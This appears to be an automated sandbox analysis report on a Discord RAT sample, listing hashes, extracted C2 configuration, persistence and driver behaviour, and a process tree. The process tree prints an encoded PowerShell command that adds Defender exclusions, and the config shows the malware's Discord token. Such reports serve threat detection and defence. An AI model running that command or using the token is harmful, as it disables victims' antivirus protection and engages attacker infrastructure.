discordrat | 260ad25ba866a0c2c53fb170fa87debbf9041a87b70a0c632786adf379c2db3a

General

Target

hgvj.exe
Size

593KB
MD5

cd7ea040328d5a26e9db4e3fe252b840
SHA1

9be79e3a740718d1b7f92c9e5a1ce0b782e47386
SHA256

260ad25ba866a0c2c53fb170fa87debbf9041a87b70a0c632786adf379c2db3a
SHA512

4e6372353c81180631ffd2378a53b2dc53408dd1e831b020eced199b1a8b5aeb53631e4e0fc1784c7e7848fd036b056ae16a78ee77dc3479c0960b576c82b86e
SSDEEP

12288:54MQmjJfELB92d9b0G8vdqk20H/ORA0y5ZU9E5bjJo9l:54MNJCM74vHGRY5+9OnJ

Score

10^/10

discordrat persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIxMDY4MTk1NTQyNzk1MDY4Mg.Gy5dHF.usUl_OuFhHY1gNEyIwlH2QhBUK8j2WHU94qm9Q
server_id
1210681778017144962

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\uNFrDJCdbdiUXypYNAmca\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\uNFrDJCdbdiUXypYNAmca"	4w94T.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	hgvj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	injector.exe

Executes dropped EXE 3 IoCs

pid	Process
3724	injector.exe
4364	Client-built.exe
2240	4w94T.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SoftwareDistribution\Download\4w94T.exe	injector.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1932	powershell.exe
1932	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
2240	4w94T.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	4364	Client-built.exe
Token: SeLoadDriverPrivilege	2240	4w94T.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4108 wrote to memory of 1932	4108	hgvj.exe	90
PID 4108 wrote to memory of 1932	4108	hgvj.exe	90
PID 4108 wrote to memory of 3724	4108	hgvj.exe	92
PID 4108 wrote to memory of 3724	4108	hgvj.exe	92
PID 4108 wrote to memory of 4364	4108	hgvj.exe	94
PID 4108 wrote to memory of 4364	4108	hgvj.exe	94
PID 3724 wrote to memory of 4284	3724	injector.exe	97
PID 3724 wrote to memory of 4284	3724	injector.exe	97
PID 3724 wrote to memory of 3472	3724	injector.exe	98
PID 3724 wrote to memory of 3472	3724	injector.exe	98
PID 3724 wrote to memory of 2240	3724	injector.exe	99
PID 3724 wrote to memory of 2240	3724	injector.exe	99

C:\Users\Admin\AppData\Local\Temp\hgvj.exe
"C:\Users\Admin\AppData\Local\Temp\hgvj.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAcwBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAaAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAeABrACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1932
- C:\Users\Admin\AppData\Local\Temp\injector.exe
  "C:\Users\Admin\AppData\Local\Temp\injector.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color 9
    3⤵
    PID:3472
- - C:\Windows\SoftwareDistribution\Download\4w94T.exe
    "C:\Windows\SoftwareDistribution\Download\4w94T.exe"
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    PID:2240
- C:\Users\Admin\AppData\Local\Temp\Client-built.exe
  "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

Filesize
78KB

MD5
a9b0036b5a427a71f462b9983ec3ed08

SHA1
3c7e7edc8f67e0d75c2ed9103e4b9aa00e9f6bdb

SHA256
bc8e1459074ad73a45d919a4be28396d3c12bb22bc0c05dc82cb502fa888e01d

SHA512
bc94330727e48a114f6d9caa1d21973a3840360beed5a61a8da648a30c562b3c9479fc05ce68fdcb0f0799234e4f74e008efc1cac591970cbc37e95541d70f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1j3iwdgm.q0o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\injector.exe

Filesize
507KB

MD5
15fa4864c56c1bc724f1098aba8f08fb

SHA1
faad863bfde036ac3ea9c65090fcdf8716d8147c

SHA256
3de2e86dde2444292306215c1082423e8ce8f99f5bf6e036dfb07ac32570c993

SHA512
75b5bd9273078823218cd061cd62d7cf8a8dd98d9e656007998dec0703169d738c760bc17ee51d5c89065c0b43d41e67e53cda3075d228e26d440d099b7e8465

Download Submit
C:\Windows\SoftwareDistribution\Download\4w94T.exe

Filesize
100KB

MD5
9886a738e05f8a8fe04e9d0c81cc0909

SHA1
f659c6a123eb11f6f34f618265dbd54a9aa7f5e3

SHA256
abf99bd1d851c4c7015b999e81fb080e7e1147973e6a3a77c8ba7895cc8abbb6

SHA512
0d3b9e9a1a38efe1e963b929a33a8a13d4636d8056ab04fce958333db983b9fb401946c9b6990d18e9c2e2d4c2dbd2fb6aae5385e4234a5d86ef8adb98d56a21

Download Submit
memory/1932-41-0x00000260C12F0000-0x00000260C1300000-memory.dmp

Filesize
64KB

Download
memory/1932-39-0x00000260C12F0000-0x00000260C1300000-memory.dmp

Filesize
64KB

Download
memory/1932-45-0x00007FF97EA30000-0x00007FF97F4F1000-memory.dmp

Filesize
10.8MB

Download
memory/1932-38-0x00000260C12F0000-0x00000260C1300000-memory.dmp

Filesize
64KB

Download
memory/1932-33-0x00000260C1210000-0x00000260C1232000-memory.dmp

Filesize
136KB

Download
memory/1932-27-0x00007FF97EA30000-0x00007FF97F4F1000-memory.dmp

Filesize
10.8MB

Download
memory/4108-2-0x00000000023C0000-0x00000000023D0000-memory.dmp

Filesize
64KB

Download
memory/4108-25-0x00007FF97EA30000-0x00007FF97F4F1000-memory.dmp

Filesize
10.8MB

Download
memory/4108-0-0x0000000000270000-0x000000000030A000-memory.dmp

Filesize
616KB

Download
memory/4108-1-0x00007FF97EA30000-0x00007FF97F4F1000-memory.dmp

Filesize
10.8MB

Download
memory/4364-24-0x00007FF97EA30000-0x00007FF97F4F1000-memory.dmp

Filesize
10.8MB

Download
memory/4364-21-0x000001F1EE770000-0x000001F1EE788000-memory.dmp

Filesize
96KB

Download
memory/4364-40-0x000001F1EEBA0000-0x000001F1EEBB0000-memory.dmp

Filesize
64KB

Download
memory/4364-44-0x000001F1F1640000-0x000001F1F1B68000-memory.dmp

Filesize
5.2MB

Download
memory/4364-23-0x000001F1F0E40000-0x000001F1F1002000-memory.dmp

Filesize
1.8MB

Download
memory/4364-56-0x00007FF97EA30000-0x00007FF97F4F1000-memory.dmp

Filesize
10.8MB

Download
memory/4364-57-0x000001F1EEBA0000-0x000001F1EEBB0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads